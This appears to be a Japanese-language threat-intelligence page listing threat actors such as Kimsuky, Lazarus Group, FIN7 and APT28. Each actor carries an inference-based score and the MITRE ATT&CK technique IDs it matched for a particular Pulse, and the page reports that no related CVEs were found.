Score: 5.59
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
MITREへのリンク →

Axiom

Score: 6.88
Matched TTPs:
  • T1049 - System Network Connections Discovery
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

INC Ransom

Score: 5.77
Matched TTPs:
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Storm-0501

Score: 4.58
Matched TTPs:
  • T1552.003 - Shell History
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

GALLIUM

Score: 5.19
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Thrip

Score: 3.60
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1556 - Modify Authentication Process
MITREへのリンク →

POLONIUM

Score: 3.25
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
MITREへのリンク →

Daggerfly

Score: 4.60
Matched TTPs:
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
MITREへのリンク →

Equation

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
MITREへのリンク →

Strider

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
MITREへのリンク →

Velvet Ant

Score: 6.53
Matched TTPs:
  • T1027.007 - Dynamic API Resolution
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.80
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1033 - System Owner/User Discovery
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1059.010 - AutoHotKey & AutoIT
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1537 - Transfer Data to Cloud Account
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1205 - Traffic Signaling
  • T1547.002 - Authentication Package
  • T1552.003 - Shell History
  • T1003.007 - Proc Filesystem
  • T1053.007 - Container Orchestration Job
MITREへのリンク →

Lazarus Group

Score: 0.76
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1055.005 - Thread Local Storage
  • T1087.002 - Domain Account
  • T1205 - Traffic Signaling
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1547.002 - Authentication Package
  • T1105 - Ingress Tool Transfer
  • T1546.016 - Installer Packages
  • T1218.010 - Regsvr32
  • T1059.010 - AutoHotKey & AutoIT
  • T1556 - Modify Authentication Process
MITREへのリンク →

Mustang Panda

Score: 0.75
Matched TTPs:
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1053.007 - Container Orchestration Job
  • T1055.005 - Thread Local Storage
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1105 - Ingress Tool Transfer
  • T1218.010 - Regsvr32
  • T1059.010 - AutoHotKey & AutoIT
  • T1556 - Modify Authentication Process
MITREへのリンク →

FIN7

Score: 0.72
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
  • T1564.002 - Hidden Users
  • T1598.003 - Spearphishing Link
  • T1011.001 - Exfiltration Over Bluetooth
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1205 - Traffic Signaling
  • T1547.002 - Authentication Package
  • T1105 - Ingress Tool Transfer
  • T1059.010 - AutoHotKey & AutoIT
MITREへのリンク →

Sandworm Team

Score: 0.71
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1049 - System Network Connections Discovery
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.002 - Authentication Package
  • T1546.016 - Installer Packages
  • T1218.010 - Regsvr32
  • T1005 - Data from Local System
  • T1059.010 - AutoHotKey & AutoIT
MITREへのリンク →

Contagious Interview

Score: 0.66
Matched TTPs:
  • T1059.006 - Python
  • T1033 - System Owner/User Discovery
  • T1199 - Trusted Relationship
  • T1021.006 - Windows Remote Management
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1556 - Modify Authentication Process
  • T1552.003 - Shell History
  • T1221 - Template Injection
MITREへのリンク →

Turla

Score: 0.64
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1113 - Screen Capture
  • T1056.001 - Keylogging
  • T1059.012 - Hypervisor CLI
  • T1606.002 - SAML Tokens
  • T1547.002 - Authentication Package
  • T1546.016 - Installer Packages
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
MITREへのリンク →

OilRig

Score: 0.59
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1598.003 - Spearphishing Link
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.010 - Regsvr32
  • T1005 - Data from Local System
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1556 - Modify Authentication Process
MITREへのリンク →

Gamaredon Group

Score: 0.57
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1059.013 - Container CLI/API
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1205 - Traffic Signaling
  • T1547.002 - Authentication Package
  • T1546.017 - Udev Rules
  • T1591.003 - Identify Business Tempo
  • T1059.010 - AutoHotKey & AutoIT
MITREへのリンク →

Threat Group-3390

Score: 0.57
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1537 - Transfer Data to Cloud Account
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1218.003 - CMSTP
  • T1546.017 - Udev Rules
  • T1218.010 - Regsvr32
  • T1059.010 - AutoHotKey & AutoIT
MITREへのリンク →

APT32

Score: 0.56
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1113 - Screen Capture
  • T1027.007 - Dynamic API Resolution
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1105 - Ingress Tool Transfer
  • T1218.010 - Regsvr32
  • T1556 - Modify Authentication Process
MITREへのリンク →

APT28

Score: 0.56
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1087.002 - Domain Account
  • T1547.002 - Authentication Package
  • T1558 - Steal or Forge Kerberos Tickets
  • T1105 - Ingress Tool Transfer
  • T1499.001 - OS Exhaustion Flood
  • T1218.010 - Regsvr32
  • T1566.003 - Spearphishing via Service
  • T1059.010 - AutoHotKey & AutoIT
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る